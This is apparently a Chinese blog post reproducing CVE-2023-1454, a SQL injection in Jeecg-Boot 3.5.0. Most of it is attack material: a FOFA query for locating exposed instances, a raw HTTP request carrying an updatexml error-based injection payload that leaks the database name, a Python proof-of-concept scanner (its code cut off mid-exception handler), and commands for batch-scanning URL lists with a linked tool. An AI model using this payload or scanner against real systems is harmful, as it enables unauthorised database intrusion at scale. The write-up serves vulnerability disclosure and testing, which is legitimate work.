【漏洞复现】Jeecg

发布时间：2025-09-11 17:12

定期更新手机系统以修复漏洞 #生活常识# #手机#

一、Jeecg-Boot 简介

JeecgBoot是一款基于BPM的低代码平台！前后端分离架构 SpringBoot 2.x，SpringCloud，Ant Design&Vue，Mybatis-plus，Shiro，JWT，支持微服务。强大的代码生成器让前后端代码一键生成，实现低代码开发！JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE，帮助Java项目解决70%的重复工作，让开发更多关注业务，既能快速提高效率，节省研发成本，同时又不失灵活性！一系列低代码能力：Online表单、Online报表、Online图表、表单设计、流程设计、报表设计、大屏设计等等

二、漏洞描述

jeecg-boot 3.5.0版本存在SQL注入漏洞，该漏洞源于文件 jmreport/qurestSql 存在安全问题，通过参数 apiSelectId 导致SQL注入。

CVE-2023-1454
CNNVD-202303-1399

三、影响版本

jeecg-boot 3.5.0版本

四、fofa查询语句

body=“jeecg-boot”

五、漏洞复现

漏洞数据包

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept-Encoding: gzip, deflate Accept: */* Connection: close Host: 127.0.0.1 Content-Type: application/json Content-Length: 126 {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '"}

成功爆出数据库名

六、POC&EXP

if url.endswith("/"): path = "jeecg-boot/jmreport/qurestSql" else: path = "/jeecg-boot/jmreport/qurestSql" if not url.startswith('http://') and not url.startswith('https://'): url = 'http://' + url encodetext = url + path headers = { "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close", "Content-Type": "application/json" } payload = { "apiSelectId": "1316997232402231298", "id": "1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '" } # Convert payload to JSON json_payload = json.dumps(payload) try: req = requests.post(encodetext, data=json_payload, headers=headers, timeout=5, proxies=self.proxies) res = req.text if req.status_code == 200 and 'XPATH' in res: self.append_to_output(f"[+] {url} 存在Jeecg-Boot前台SQL注入漏洞(CVE-2023-1454)！！！！", "red") #self.append_to_output(res, "yellow") with open("output.txt", "a") as file: file.write(f"[+] {url} 存在Jeecg-Boot前台SQL注入漏洞(CVE-2023-1454)！！！！" + "\n") file.write(res + "\n") else: self.append_to_output(f"[-] {url} 不存在Jeecg-Boot前台SQL注入漏洞(CVE-2023-1454)", "green") except Timeout: self.append_to_output(f"[!] 请求超时，跳过URL: {url}", "yellow") except Exception as e:

七、批量扫描

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 单个url测试 python3 CVE-2023-1454-scan.py -f url.txt 批量检测扫描结束后会在当前目录生成存在漏洞url的vuln.txt https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln